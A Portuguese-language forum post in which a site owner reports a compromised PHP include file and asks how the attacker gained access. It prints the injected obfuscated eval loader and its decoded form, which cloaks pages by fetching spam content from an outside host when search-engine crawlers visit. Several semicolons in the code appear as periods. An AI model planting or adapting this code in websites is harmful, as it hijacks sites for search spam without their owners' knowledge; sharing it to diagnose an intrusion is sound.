Código malicioso
Olá, O site do meu cliente sofreu um tipo de invasão. Alteraram 1 unico arquivo, que é incluido em todas as páginas do site. Colocaram o seguinte código.
<?php
function lVwAum($gBb){
$code='bas'.'e64_d'.'eco'.'de'. $gBb=gzinflate($code($gBb)). for($i=0. $i<strlen($gBb). $i++) {
$gBb[$i] = chr(ord($gBb[$i])-1). } return $gBb. }eval(lVwAum("pVR/a9swEP0AhX4HVYTFhuAkjI3R1OlK8NrCmnSOMxhtMYpzjtU6licpWUPpZ99Zzg8na0th/sOHdPee7k7vRAh+hwcgpZChhFxIzbOp1bI7pPTE8yzSXGREJ6ByPgFp2U+HB4TU2BQy7VJjjqmjtNQiFX8woBYOPf+n59/QiyC4Dke4Cs/OvX5A7+yOwSpgUrKla/4WnQoxTYE2KFMP+F+yRAi0Y0wFTcwiGAvxQEtwLCSwKLHWJISpgtB+IjwmFqaRC2WV2TWK/W7LJhL0XGINcg6d54JktRGzVAGyPu8WOpJpT2QaGazaXKY2eSpaQfAA62gdF8IjV1pZ9QgjQp5xXbdNoInEGmOeQhiVNIq4xKynoDd7JXdnhXgmgLlUCaIEURt2axOJLs1nIOYa/e3WdtvEKtAi18RCeIP0Rv73wXUQommQnePeiva9YOT3A/+sP/zm+Q3SfheqN+j3vV4QXF55g1HQ2CRZzXu/J4YNHiEqqPZPiVKhYMdRvbpdrjIC/bsXGUsxQ45CsUX1EmKQLjXmTcn6Hhbu+aVeC1lt0S6l9r58/kPP71Pz+vTXBP2vnPdHF3SOI7GaXdRxLTz3gps6n9TvjqolGcZVJ4vSrcrcf/hQZUKxm1lOtM4TobT7ejsvBsPK7EeS5zpjM3gZMez5lyin/tmVt8H8noNcYjQ28GXQj5Hn/wqHgX/ZP9+gYmybS4v8jpvNRZ59/uJEYtZMm5F08iQ/5ROXOl8rnTAwMUblAcusNQvqbMI0I+7eyxCbeVr1E7NKIbM20Xa33WrhRRVuiBKx5TGIYtYLmwArWmva1Gw7bfKp9ZEMQS54BCSAGT7ITPJ0SUYZWzCesjHqqjwU3x+9valSphXJ710W3pVJg56U/Scpy6Zz9Lm39J4tqINajSQa9N1SomSEjgTXpntomzMhMrQPXOHf4Vksit3UuUejbmn3pFkyd0/GstmlmNo2w9Pu4cFf")).?>Mandei imprimir o resultado dessa função na tela para ver o que era e retornou isso:
error_reporting(0). function thespider(){ $agent="agent:".strtolower($_SERVER["HTTP_USER_AGENT"]). $searray=array("google","ask","yahoo","bing","facebook"). foreach($searray as $se){ if (strpos($agent,$se)>0) return true. } return false. } function theUrlContent($url) { if(!function_exists('curl_init')) { $file_contents = file_get_contents($url). } else { $ch = curl_init(). $timeout = 10. curl_setopt ($ch, CURLOPT_URL, $url). curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1). curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout). $file_contents = curl_exec($ch). curl_close($ch). } return $file_contents. } function thefromse(){ $urlrefer="refer:".strtolower($_SERVER["HTTP_REFERER"]). if ($urlrefer=="") return false. $searray=array("google","ask","yahoo","bing","facebook"). foreach($searray as $se){ if (strpos($urlrefer,$se)>0) return true. } return false. } function thesetpage(){ if($_GET['id']!="") return true. } if(thespider()&&thesetpage()) { $httphost=strtolower($_SERVER["HTTP_HOST"]). $scriptname=strtolower($_SERVER["SCRIPT_NAME"]). $querystring=strtolower($_SERVER["QUERY_STRING"]). $furl="http://vpn68.com/l/cr.php?id=".@$_GET['id']. ob_clean(). $filedata =theUrlContent($furl). if(strlen($filedata)>1000) echo $filedata. else header("HTTP/1.1 503 Service Temporarily Unavailable"). exit. } if (thefromse()&&thesetpage()){ echo "
". exit. }?>Esse arquivo que foi modificado não tem acesso a banco de dados e nem formulário, ele é estático, nele mantenho as variáveis principais, como URL, titulo de página, etc. Tem como saber a forma que ele teve acesso a esse arquivo para alterar? Obrigado
Discussão (4)
Carregando comentários...